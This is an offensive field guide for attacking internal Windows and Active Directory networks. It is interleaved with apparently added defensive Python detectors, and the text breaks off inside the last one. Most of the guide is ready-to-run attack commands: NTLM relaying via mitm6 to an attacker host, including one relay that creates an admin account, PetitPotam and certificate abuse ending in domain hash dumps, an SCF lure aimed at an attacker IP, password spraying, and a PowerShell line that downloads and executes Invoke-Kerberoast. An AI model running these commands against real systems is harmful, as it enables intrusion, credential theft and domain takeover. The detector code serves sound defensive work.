Internal Field Guide

This document provides an overview of reconnaissance techniques for discovering assets, users, and credentials on a Windows network. It describes unauthenticated methods like port scanning and NULL sessions, as well as authenticated techniques using tools like BloodHound, CrackMapExec, and ldapdomaindump to dump information from Active Directory like computers, users, groups and their membership. Hashes and plain text credentials can then be extracted from Active Directory databases or cached on systems.

Uploaded by ehlaban
Copyright: © All Rights Reserved

Table of Contents

RECONNAISSANCE ...................................................................................... 3
IPV4 NETWORK ACCESS CONTROL (NAC) BYPASS ................................................................ 4
UNAUTHENTICATED ASSET DISCOVERY .................................................................................. 5
UNAUTHENTICATED USER DISCOVERY ................................................................................... 6
AUTHENTICATED ASSET/USERNAME DISCOVERY ...................................................................... 8
PORT DISCOVERY .......................................................................................................... 10
VULNERABILITY IDENTIFICATION ................................................................. 12
VULNERABILITY SCANNERS ............................................................................................... 13
INITIAL FOOTHOLD .................................................................................... 14
DEFAULT CREDENTIALS .................................................................................................... 15
ACQUIRE CREDENTIALS ................................................................................................... 16
CRACKING HASHES ................................................................................... 21
WORDLISTS AND RULES AND MASKS ................................................................................... 22
WINDOWS VERTICAL PRIVILEGE ESCALATION ............................................. 24
REMOTE USER TO ADMIN ................................................................................................. 25
WINDOWS HORIZONTAL PRIVILEGE ESCALATION ........................................ 27
LOGGED IN USERS ......................................................................................................... 28
REMOTE MIMIKATZ/LSA DUMPS FROM LOCAL ADMIN ........................................................... 28
PASS THE HASH (PTH) .................................................................................................... 29
PASS THE KEY (PTK) ....................................................................................................... 30
PASS THE TICKET (PTT) .................................................................................................... 32
SILVER TICKET ................................................................................................................ 33
GOLDEN TICKET ............................................................................................................. 35
AUTOMATE LOCAL ADMIN TO DOMAIN ADMIN (NOISY) ....................................................... 37
CREDENTIAL PILLAGING ............................................................................ 38
EXTRACT SAM & CACHED HASHES MANUALLY .................................................................... 39
EXTRACT NTDS.DIT HASHES MANUALLY .............................................................................. 39
EXTRACT NTDS.DIT HASHES (AUTOMATED) ......................................................................... 39
FIND PLAINTEXT PASSWORDS ............................................................................................ 40
WPA PSK STRING EXTRACTION ........................................................................................ 42
WIRELESS .................................................................................................. 44
WPA/WPA2 HASH CAPTURE WITH USERS ........................................................................... 45
WPA/WPA2 HASH CAPTURE WITHOUT USERS (PMKID) ........................................................ 45
WPS ........................................................................................................................... 46
ENTERPRISE WIRELESS ...................................................................................................... 46
EVIL TWIN (SOCIAL ENGINEERING) .................................................................................... 47
OPEN WIRELESS ............................................................................................................. 47
WEP WIRELESS .............................................................................................................. 47
METHODOLOGY ........................................................................................ 49

Internal Security Assessment: Field Guide Page 1


INTERNAL RUN BOOK FOR MOST WINDOWS NETWORKS (QUICK ACCESS) ................................. 50

RECONNAISSANCE

IPV4 NETWORK ACCESS CONTROL (NAC) BYPASS

Bypass IPv4 with IPv6


#Most defensive tools exclusively look at IPv4 addresses. Forcing traffic over IPv6 yields a high chance you will go undetected and be unchallenged.
#Use Metasploit to scan to determine if IPv6 is in use.

auxiliary/scanner/discovery/ipv6_multicast_ping

auxiliary/scanner/discovery/ipv6_neighbor

auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement

SMB server
#Launch a man in the middle attack over IPv6 to SMB share.
https://github.com/fox-it/mitm6.git
https://github.com/SecureAuthCorp/impacket.git

mitm6 -i eth0

smbserver.py SMB_SHARE_NAME path/to/share

Responder
#Launch a man in the middle attack over IPv6.
https://github.com/fox-it/mitm6.git
https://github.com/lgandx/Responder

mitm6 -i eth0

responder -I eth0 -wFv

ntlmrelayx
#Launch a man in the middle attack over IPv6.
https://github.com/fox-it/mitm6.git
https://github.com/SecureAuthCorp/impacket.git

mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqnd

ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad --delegate-access

ntlmrelayx.py -wh ATTACKER_IP -t smb://TARGET_IP/ -i

OR

ntlmrelayx.py -ip 0.0.0.0 -t rpc://example.local -c "net user xyzuser xyzpass /add && net localgroup Administrators xyzuser /add"
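The mitm6 technique above works by answering DHCPv6 Solicit messages so that the victim adopts the attacker as its IPv6 DNS server. The detector below is an added example, not part of the field guide: it parses DHCPv6 Advertise/Reply messages (RFC 8415 layout) and alerts when the offered resolver (option 23) is outside an allowlist. The approved resolver address, the DUID and the sample packets are constructed for the dry run.

```python
"""Flag DHCPv6 Advertise/Reply messages that offer an unexpected DNS server.

Message and option layout follow RFC 8415: a 1-byte msg-type, a 3-byte
transaction id, then TLV options (2-byte code, 2-byte length, data).
Option 2 is the server DUID, option 23 the DNS resolver list (16 bytes each),
option 24 the domain search list in DNS wire format.
"""
import ipaddress
import struct
from typing import Dict, List, Optional, Set, Tuple

MSG_NAMES = {1: "SOLICIT", 2: "ADVERTISE", 3: "REQUEST", 5: "RENEW", 7: "REPLY"}
OPT_SERVERID, OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 2, 23, 24

# Constructed allowlist: the only resolver the organisation's DHCPv6 servers hand out.
APPROVED_DNS: Set[ipaddress.IPv6Address] = {ipaddress.IPv6Address("fd00:1::53")}


def parse_options(data: bytes) -> List[Tuple[int, bytes]]:
    """Walk the TLV list; a truncated option is an error, not something to guess around."""
    opts, pos = [], 0
    while pos + 4 <= len(data):
        code, length = struct.unpack("!HH", data[pos:pos + 4])
        body = data[pos + 4:pos + 4 + length]
        if len(body) != length:
            raise ValueError("truncated DHCPv6 option %d" % code)
        opts.append((code, body))
        pos += 4 + length
    if pos != len(data):
        raise ValueError("trailing bytes after option list")
    return opts


def decode_domain_list(body: bytes) -> List[str]:
    """Decode option 24: a sequence of uncompressed DNS names (length-prefixed labels)."""
    names, labels, pos = [], [], 0
    while pos < len(body):
        n = body[pos]
        pos += 1
        if n == 0:
            names.append(".".join(labels))
            labels = []
        else:
            labels.append(body[pos:pos + n].decode("ascii", "replace"))
            pos += n
    return names


def parse_dhcpv6(packet: bytes) -> Dict:
    """Return message type, transaction id, server DUID, DNS servers and search list."""
    if len(packet) < 4:
        raise ValueError("DHCPv6 message too short")
    msg = {"type": MSG_NAMES.get(packet[0], str(packet[0])),
           "xid": int.from_bytes(packet[1:4], "big"),
           "server_duid": None, "dns": [], "search": []}
    for code, body in parse_options(packet[4:]):
        if code == OPT_SERVERID:
            msg["server_duid"] = body.hex()
        elif code == OPT_DNS_SERVERS:
            if len(body) % 16:
                raise ValueError("DNS server option is not a multiple of 16 bytes")
            msg["dns"] = [ipaddress.IPv6Address(body[i:i + 16]) for i in range(0, len(body), 16)]
        elif code == OPT_DOMAIN_LIST:
            msg["search"] = decode_domain_list(body)
    return msg


def rogue_dns_offer(packet: bytes, approved=APPROVED_DNS) -> Optional[str]:
    """Alert text if an ADVERTISE/REPLY pushes a resolver outside the allowlist, else None."""
    msg = parse_dhcpv6(packet)
    if msg["type"] not in ("ADVERTISE", "REPLY"):
        return None
    bad = [str(a) for a in msg["dns"] if a not in approved]
    if not bad:
        return None
    return "rogue DHCPv6 %s xid=%06x duid=%s dns=%s search=%s" % (
        msg["type"], msg["xid"], msg["server_duid"], ",".join(bad), ",".join(msg["search"]))


def build_advertise(xid: int, dns: str, search: str) -> bytes:
    """Constructed test fixture: a minimal ADVERTISE carrying SERVERID, DNS and domain list."""
    duid = bytes.fromhex("00010001") + b"\x00" * 4 + bytes.fromhex("0200deadbeef")  # DUID-LLT
    labels = b"".join(bytes([len(l)]) + l.encode() for l in search.split(".")) + b"\x00"
    opts = (struct.pack("!HH", OPT_SERVERID, len(duid)) + duid
            + struct.pack("!HH", OPT_DNS_SERVERS, 16) + ipaddress.IPv6Address(dns).packed
            + struct.pack("!HH", OPT_DOMAIN_LIST, len(labels)) + labels)
    return bytes([2]) + xid.to_bytes(3, "big") + opts


if __name__ == "__main__":
    # One legitimate offer and one that redirects DNS to a link-local host (constructed).
    for pkt in (build_advertise(0x1234, "fd00:1::53", "internal.corp"),
                build_advertise(0xABCD, "fe80::1337", "internal.corp")):
        print(rogue_dns_offer(pkt) or "ok")
```

In production the packets come from a capture of UDP/547 to UDP/546 on the segment; any Advertise from a DUID that is not one of your DHCPv6 servers is worth an alert on its own.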

UNAUTHENTICATED ASSET DISCOVERY


#Various techniques to enumerate hosts and services
Private IPv4 Networks

10.0.0.0/8

172.16.0.0/12

192.168.0.0/16

ARP Scan

netdiscover -i eth0

NetBIOS Scan

nbtscan <CIDR>

Limited Port Scan

nmap -sS -p 445,22,80 <CIDR> --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open

Ping Scan

nmap -sP <CIDR>

Mass Scan

masscan <CIDR> --top-ports 100

DNS/DC Enumeration

fierce -dns example.com

OR

nmap --script dns-brute example.com

UNAUTHENTICATED USER DISCOVERY

NULL Session
https://github.com/byt3bl33d3r/CrackMapExec

https://github.com/trustedsec/ridenum

crackmapexec smb example.local -u '' -p '' --users

OR

smbclient -N -U "" -L \\example.local

OR

rpcclient -N -U "" -L \\example.local

rpcclient $> enumdomusers

OR

ridenum.py example.local 500 50000 | tee -a ridenum.log

Anonymous Enumeration of AD

ldapsearch -LLL -x -H ldap://test.local -b '' -s base '(objectclass=*)'

Username Enumeration
# Bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='test.local',userdb=usernames.txt 10.10.10.1

AUTHENTICATED ASSET/USERNAME DISCOVERY

Basic User and Host Dump of AD Computers


https://github.com/dirkjanm/ldapdomaindump

ldapdomaindump -u DOMAIN\\notanadmin -p QWERTY <target>

Dump Active Directory Subnet


https://pingcastle.com/download/
https://github.com/NetSPI/goddi.git

1) pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD>

2) PingCastle.exe --hc-conso

OR

.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe

AD Dump
https://github.com/fox-it/BloodHound.py

bloodhound-python -u <USERNAME> -p <PASSWORD> -c all

#Computers

cat computers.json|jq -r '.computers[] | .Properties |.name'

#Users

cat users.json|jq -r '.users[] | .Properties |.name'

#Admins

cat users.json|jq -r '.users[] | .Properties |select(.admincount==true) |.name'

https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec ldap example.local -u USERNAME -p PASSWORD --admin-count

Computer Asset Dump


apt install ldap-utils

ldapsearch -LLL -H ldap://ad.ourdomain.local -x -D 'OURDOMAIN\user' -w 'thepassword' -b 'dc=ourdomain,dc=local' 'objectClass=computer' name

Local User Dump


https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb 192.168.1.0/24 -u USERNAME -p 'PASSWORD' --users

Basic User DNS Dump


https://github.com/dirkjanm/adidnsdump

adidnsdump -u DOMAIN\\notanadmin <target>

Domain Admins Locator


https://github.com/nullbind/Powershellery/blob/master/Stable-ish/Get-SPN/Get-SPN.psm1

Get-SPN -type group -search "Domain Admins" -List yes -DomainController <target> -Credential domainuser | Format-Table -Autosize

Dump Global Address List


https://github.com/dafthack/MailSniper

Get-GlobalAddressList -ExchHostname exchange.example.local -Username [email protected] -Password Password123

Dump Active Directory Usernames
https://github.com/dafthack/MailSniper

Get-ADUsernameFromEWS -Emaillist .\users.txt

PORT DISCOVERY

Rapid TCP Port Scan


#Scan for the most common ports of interest. Helpful for quick results on a large scope.

nmap -iL targets.txt --excludefile exclude.txt --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -oX /tmp/nmap.xml

OR

masscan -iL targets.txt --top-ports 100 -oX /tmp/nmap.xml

Default TCP Port Scan


#Scan for the most common/default ports. Slower results on a large scope.

nmap -iL targets.txt --excludefile exclude.txt --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -oX /tmp/nmap.xml

Rapid TCP/UDP Port Scan


#Scan for the most common ports of interest. Helpful for quick results on a large scope.

nmap -iL targets.txt --excludefile exclude.txt --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,5353,49152 --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -oX /tmp/nmap.xml

Extensive TCP Port Scan
#Scan for the most common ports of interest. Very slow on a large scope.

nmap -iL targets.txt -p- --excludefile exclude.txt --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -oX /tmp/nmap.xml

VULNERABILITY IDENTIFICATION

VULNERABILITY SCANNERS
Invest in a decent vulnerability scanner for internal assessments. This can help automate identification of
low hanging fruit.

Paid Scanning Tools | Function
Tenable Nessus | Infrastructure Vulnerability Scanner, Light Application Analysis
Rapid7 Nexpose | Infrastructure Vulnerability Scanner, Light Application Analysis
Saint | Infrastructure Vulnerability Scanner, Light Application Analysis
BurpSuite | Heavy, Manual Web Application Analysis
Acunetix | Automated Web Application Analysis
Netsparker | Automated Web Application Analysis

Free Scanning Tools | Function
OpenVAS | Infrastructure Vulnerability Scanner, Light Application Analysis
Wapiti | Web Application Analysis only
NMAP Scripts | Infrastructure Vulnerability Scanner, Light Application Analysis
Metasploit Auxiliary Modules | Infrastructure Vulnerability Scanner, Light Application Analysis
Nuclei | Crowdsourced Infrastructure Vulnerability Scanner, Application Analysis

INITIAL FOOTHOLD

DEFAULT CREDENTIALS
#All of the tools below help to look for default credential usage. No one tool will find all the default credentials.
NMAP Default Creds

nmap --script http-default-accounts -p 80,81,280,591,593,832,981,1311,2480,4444,4445,4567,5000,5104,5800,7000,7001,7002,8008,8042,8088,8222,8243,8280,8281,8333,8530,8531,8887,8888,9080,9981,12443,12043,12046,16080,18091,18092,8080,443,8443,8081,9090,9091,8000,10443,22,21,23 -iL targets.txt -oX /tmp/nmap_output.xml

Nuclei Cred Scan


#HTTP credential scanner.
https://github.com/projectdiscovery/nuclei.git

nuclei -l urls.txt -t /root/nuclei-templates/default-logins

Changeme Cred Scan


#HTTP scanner by default, has support for SSH, SSH keys, and SNMP.
https://github.com/ztgrace/changeme.git

changeme.py nmap_output.xml

Manual Login Identification


https://github.com/projectdiscovery/httpx

cat hosts.txt | httpx -threads 500 -ms "assword"

EyeWitness Active Cred Scan


#HTTP credential scanner.
https://github.com/FortyNorthSecurity/EyeWitness.git

EyeWitness.py -x default_creds.xml --active-scan --web

BruteSpray Cred Scan


#Imports an nmap XML file, and scans for the below supported services.
• ssh, ftp, telnet, vnc, mssql, mysql, postgresql, rsh, imap, nntp, pcanywhere, pop3, rexec, rlogin, smbnt, smtp, svn, vmauthd, snmp
https://github.com/x90skysn3k/brutespray.git

python brutespray.py --file nmap_output.xml --threads 5 --hosts 5

Brutex Cred Scan


#Automatically brute force all logins running on a target.
https://github.com/1N3/BruteX.git

brutex <target>

Metasploit Cred Scans


#Miscellaneous scanner modules for specific services and goals.

use auxiliary/scanner/*

ACQUIRE CREDENTIALS

AD CS Abuse
https://github.com/topotam/PetitPotam

https://github.com/dirkjanm/PKINITtools

python3 Petitpotam.py <attacking machine's IP> <target Domain Controller's IP>

cat base64 | base64 -d > certificate.pfx

python3 gettgtpkinit.py example.local/DC01NAME\$ -cert-pfx certificate.pfx out.ccache

KRB5CCNAME=out.ccache python3 getnthash.py example.local/DC01\$ -key e19fd...blah

crackmapexec ldap DC01.example.local -u DC01\$ -H 6e02...truncated --admin-count

KRB5CCNAME=out.ccache python3 gets4uticket.py kerberos+ccache://domain.local\\DC01\$:[email protected] cifs/[email protected] [email protected] Administrator.ccache -v

export KRB5CCNAME='/path/to/Administrator.ccache'

secretsdump.py domain.local/[email protected] -k -no-pass

SMB relay/IPv6 DNS poison


https://github.com/fox-it/mitm6.git
https://github.com/SecureAuthCorp/impacket.git

crackmapexec smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt

mitm6 -i eth0 -d example.local

ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt -smb2support

Mitm6, ntlmrelayx and RBCD


https://github.com/fox-it/mitm6.git
https://github.com/SecureAuthCorp/impacket.git

mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqnd

ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad --delegate-access

getST.py -spn cifs/example.local example.local/NEW_PC_NAME\$ -impersonate admin

export KRB5CCNAME=admin.ccache

secretsdump.py -k -no-pass admin.ccache

SCF Upload
#SMB Share File attack.

Create an SCF file with the following:

[Shell]
Command=2
IconFile=\\<attacker IP>\share\test.ico
[Taskbar]
Command=ToggleDesktop

Upload to the share.

responder -I eth0 -v
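The SCF lure above works because Explorer resolves [Shell] IconFile the moment a folder is listed, so a UNC IconFile makes every visitor authenticate to that host. The scanner below is an added example, not part of the field guide: it walks a share, parses each .scf file and reports those whose IconFile points at a host outside an allowlist. The trusted host name, the share layout and the sample files are constructed; the share is assumed to be mounted locally.

```python
"""Find SCF lures on a share: files whose IconFile points Explorer at a remote UNC host.

The .scf format is an INI-style text file; only [Shell] IconFile matters here.
"""
import os
import re
import tempfile
from typing import Dict, List, Optional, Set

UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")
# Constructed allowlist: hosts that legitimately serve icons for this share.
TRUSTED_HOSTS: Set[str] = {"fileserver.internal.corp"}


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-like body into {section: {key: value}} with lower-cased names."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def icon_host(scf: Dict[str, Dict[str, str]]) -> Optional[str]:
    """Host named by [Shell] IconFile when it is a UNC path; None for local paths."""
    match = UNC_HOST.match(scf.get("shell", {}).get("iconfile", ""))
    return match.group(1).lower() if match else None


def find_lures(root: str, trusted: Set[str] = TRUSTED_HOSTS) -> List[Dict[str, str]]:
    """Walk the share and report SCF files whose IconFile host is not on the allowlist."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                scf = parse_scf(fh.read())
            host = icon_host(scf)
            if host and host not in trusted:
                findings.append({"path": path, "host": host,
                                 "command": scf["shell"].get("command", "")})
    return findings


def make_sample_share() -> str:
    """Constructed share: one benign UNC icon, one local icon, one lure like the guide's SCF."""
    root = tempfile.mkdtemp(prefix="scf-scan-")
    samples = {
        "desktop.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\FileServer.internal.corp\\icons\\d.ico\r\n",
        "readme.scf": "[Shell]\r\nCommand=2\r\nIconFile=C:\\Windows\\explorer.exe,3\r\n",
        "@update.scf": ("[Shell]\r\nCommand=2\r\nIconFile=\\\\10.0.0.99\\share\\test.ico\r\n"
                        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"),
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for hit in find_lures(make_sample_share()):
        print("suspicious SCF %s -> authenticates to %s" % (hit["path"], hit["host"]))
```

The same IconFile check applies to .url and .lnk files dropped on writable shares; restricting write access on shares that every user browses removes the planting step entirely.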

LLMNR/NBTNS/mDNS poisoning – Capture Hashes

responder -I eth0 -rPv

Find Hosts with SMB Signing Disabled

crackmapexec smb <CIDR> --gen-relay-list smbrelay.txt

LLMNR/NBTNS/mDNS poisoning – Relay Hashes


#Configure Responder to redirect user auth. In responder.conf, set SMB, HTTP and HTTPS to OFF in the list of servers to start, then:

responder -I eth0 -v

ntlmrelayx.py -tf smbrelay.txt

Devices with LDAP enabled


Finding printers
https://github.com/rvrsh3ll/SharpPrinter
https://github.com/percx/Praeda.git
Manual Exploit

Search for default credentials on printers with LDAP enabled

netcat -l -vv -p 444

Initiate an LDAP query.

Seth MiTM RDP Connections


https://github.com/SySS-Research/Seth

seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP>

Resource-based Constrained Delegation


https://github.com/SecureAuthCorp/impacket.git

mitm6 -i eth0 -d <domain>

ntlmrelayx.py -t ldaps://<DomainController> -wh attacker-wpad --delegate-access

export KRB5CCNAME=<TGS_ccache_file>

secretsdump.py -k -no-pass <VictimPC>

Password Spray
Collect usernames from the internet.
• theHarvester - https://github.com/laramies/theHarvester.git
• LinkedInt - https://github.com/mdsecactivebreach/LinkedInt
• Raven - https://github.com/0x09AL/raven
• Hunter.io
• Dehashed.com - $4.49 purchase required
• Scylla - https://scylla.sh/
• Authenticated Asset/Username Discovery section (above)
https://github.com/Greenwolf/Spray.git

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

Crackmapexec

crackmapexec <protocol> <target(s)> -u username1 -p password1 password2

crackmapexec <protocol> <target(s)> -u username1 username2 -p password1

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

https://github.com/ReverendThing/Carnivore
#For MS Cloud services only

Carnivore.exe
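The spray tools above try one or two passwords against many accounts and pace themselves under the lockout threshold, so per-account failure counts stay low. The detector below is an added example, not part of the field guide: it counts distinct accounts per source address inside a time window over failed-logon records, which is what exposes the pattern. The record format, thresholds and sample lines are constructed; the sub-status codes are the NTSTATUS values event 4625 reports.

```python
"""Surface password sprays in failed-logon records by counting accounts per source.

Constructed record format: '<iso-time> <event-id> <source-ip> <account> <sub-status>'.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

MIN_DISTINCT_ACCOUNTS = 5             # distinct accounts from one source ...
SPRAY_WINDOW = timedelta(minutes=30)  # ... within this window is treated as a spray
SPRAY_SUBSTATUS = {"0xc000006a",      # STATUS_WRONG_PASSWORD: valid account, bad password
                   "0xc0000064"}      # STATUS_NO_SUCH_USER: harvested name that does not exist

# Constructed sample: 10.0.0.77 walks a harvested user list with one password (spray);
# 10.0.0.20 is one user mistyping their own password six times (not a spray).
SAMPLE_LOG = """
2024-03-01T08:00:00 4625 10.0.0.77 alice 0xC000006A
2024-03-01T08:02:00 4625 10.0.0.77 bob 0xC000006A
2024-03-01T08:04:00 4625 10.0.0.77 carol 0xC0000064
2024-03-01T08:06:00 4625 10.0.0.77 dave 0xC000006A
2024-03-01T08:08:00 4625 10.0.0.77 erin 0xC000006A
2024-03-01T08:10:00 4625 10.0.0.77 frank 0xC000006A
2024-03-01T08:00:00 4625 10.0.0.20 grace 0xC000006A
2024-03-01T08:01:00 4625 10.0.0.20 grace 0xC000006A
2024-03-01T08:03:00 4625 10.0.0.20 grace 0xC000006A
2024-03-01T08:05:00 4625 10.0.0.20 grace 0xC000006A
2024-03-01T08:07:00 4625 10.0.0.20 grace 0xC000006A
2024-03-01T08:09:00 4625 10.0.0.20 grace 0xC000006A
2024-03-01T09:30:00 4625 10.0.0.77 heidi 0xC000006A
"""


def parse_record(line: str) -> Dict:
    ts, event_id, src, account, substatus = line.split()
    return {"time": datetime.fromisoformat(ts), "id": int(event_id), "src": src,
            "account": account.lower(), "substatus": substatus.lower()}


def find_sprays(lines: List[str]) -> List[Dict]:
    """One alert per source that touches MIN_DISTINCT_ACCOUNTS accounts inside SPRAY_WINDOW."""
    per_source = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        rec = parse_record(line)
        if rec["id"] == 4625 and rec["substatus"] in SPRAY_SUBSTATUS:
            per_source[rec["src"]].append(rec)
    alerts = []
    for src, recs in per_source.items():
        recs.sort(key=lambda r: r["time"])
        for i, first in enumerate(recs):          # sliding window anchored at each failure
            window = [r for r in recs[i:] if r["time"] - first["time"] <= SPRAY_WINDOW]
            accounts = sorted({r["account"] for r in window})
            if len(accounts) >= MIN_DISTINCT_ACCOUNTS:
                alerts.append({"src": src, "start": first["time"].isoformat(),
                               "accounts": accounts, "attempts": len(window)})
                break
    return alerts


if __name__ == "__main__":
    for alert in find_sprays(SAMPLE_LOG.splitlines()):
        print("spray from %(src)s starting %(start)s: %(attempts)d attempts, accounts %(accounts)s" % alert)
```

For Kerberos logons the equivalent records are event 4771 (pre-authentication failed) on the domain controller; the same per-source account count applies.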

CRACKING HASHES

WORDLISTS AND RULES AND MASKS

Wordlists
• https://mega.nz/#!aqRS2CJZ!TjbvyNcrXxMXNNRiUOIsz91NrzVuqm_r-Z_CZ_udD5Q
• https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
• https://github.com/danielmiessler/SecLists/tree/master/Passwords
• https://hashes.org/leaks.php

Create Company Specific Wordlist


#Businesses often share a common password related to the business.
https://github.com/digininja/CeWL

cewl -d 3 -m 4 -w /tmp/cewl-wordlist.txt http://domain.com

https://gist.github.com/lanmaster53/a0d3523279f3d1efdfe6d9dfc4da0d4a

Usage:

1. Point Burp Suite to Jython in the Extender > Options tab.

2. Install this extension manually in the Extender > Extensions tab.

3. Select an option for extension output (File, Console or UI).

4. Right-click on any element in the Target tab's hierarchical sitemap.

5. Select the Extensions > Create wordlist context menu item.

Common Hashes to Crack (Hashcat)


900 | MD4
0 | MD5
3000 | LM
1000 | NTLM
1100 | Domain Cached Credentials (DCC), MS Cache
2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2

5500 | NetNTLMv1
5600 | NetNTLMv2
2500 | WPA/WPA2
13100 | Kerberos 5 TGS-REP etype 23 (Kerberoast)
18200 | Kerberos 5 AS-REP etype 23 (ASREPRoast)

Convert MSCache2 from crackmapexec to Hashcat Format

cat /root/.cme/logs/*.cached |cut -d : -f2- > mscach2_hashes.txt

Wordlist/No rules

hashcat -m 5600 -O -w 3 admin_hash.txt fav_wordlist.txt

Wordlist W/rules

hashcat -m 5600 -O -w 3 admin_hash.txt fav_wordlist.txt -r /usr/share/hashcat/rules/d3ad0ne.rule

Bruteforce No Special Char

hashcat -m 5600 -O -w 3 admin_hash.txt -a3

Crack IPMI

hashcat --username -m 7300 -O -w 3 admin_hash.txt fav_wordlist.txt -r /usr/share/hashcat/rules/d3ad0ne.rule

Combination Attack

hashcat -m 0 -a 1 hash.txt dict1.txt dict2.txt

WINDOWS VERTICAL PRIVILEGE ESCALATION

REMOTE USER TO ADMIN

AD CS Abuse
Certipy

certipy 'example/john:[email protected]' auto

ASREPRoast
Crackmapexec

crackmapexec ldap <Domain Controller> -u users.txt -p '' --asreproast output.txt

crackmapexec ldap <Domain Controller> -u username -p pass --asreproast output.txt

Kerberoast
https://github.com/SecureAuthCorp/impacket.git (Linux)

GetUserSPNs.py -request domain.info/notanadmin

crackmapexec ldap <Domain Controller> -u username -p pass --kerberoasting output.txt

https://github.com/GhostPack/Rubeus.git (Windows)

.\Rubeus.exe kerberoast /outfile:

PowerShell

$webreq = [System.Net.WebRequest]::Create('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); $resp=$webreq.GetResponse(); $respstream=$resp.GetResponseStream(); $reader=[System.IO.StreamReader]::new($respstream); $content=$reader.ReadToEnd(); IEX($content); Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ASCII kerb-Hash0.txt
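Both roasting techniques above leave a trace on the domain controller: a Kerberoast is a burst of event 4769 service-ticket requests with TicketEncryptionType 0x17 (RC4) for user-owned SPNs from one requester, and an AS-REP roast is an event 4768 with PreAuthType 0 and an RC4 ticket. The detector below is an added example serving the ASREPRoast and Kerberoast sections; it is not part of the field guide. The event records, thresholds and account names are constructed; field names follow the Windows Security event schema.

```python
"""Detect Kerberoast and AS-REP roast requests in domain-controller audit events."""
from collections import defaultdict
from datetime import datetime, timedelta
import json
from typing import Dict, List

RC4_HMAC = "0x17"
KERBEROAST_MIN_SERVICES = 3              # distinct RC4 service tickets for one requester ...
KERBEROAST_WINDOW = timedelta(minutes=5)  # ... inside this window raises an alert

# Constructed sample: one JSON record per line with the fields the rules need.
SAMPLE_LOG = """
{"id": 4768, "time": "2024-03-01T09:00:00", "TargetUserName": "svc-backup", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.20"}
{"id": 4768, "time": "2024-03-01T09:00:05", "TargetUserName": "svc-legacy", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.77"}
{"id": 4769, "time": "2024-03-01T09:01:00", "TargetUserName": "notanadmin@EXAMPLE.LOCAL", "ServiceName": "WS01$", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.77"}
{"id": 4769, "time": "2024-03-01T09:01:01", "TargetUserName": "notanadmin@EXAMPLE.LOCAL", "ServiceName": "svc-sql", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.77"}
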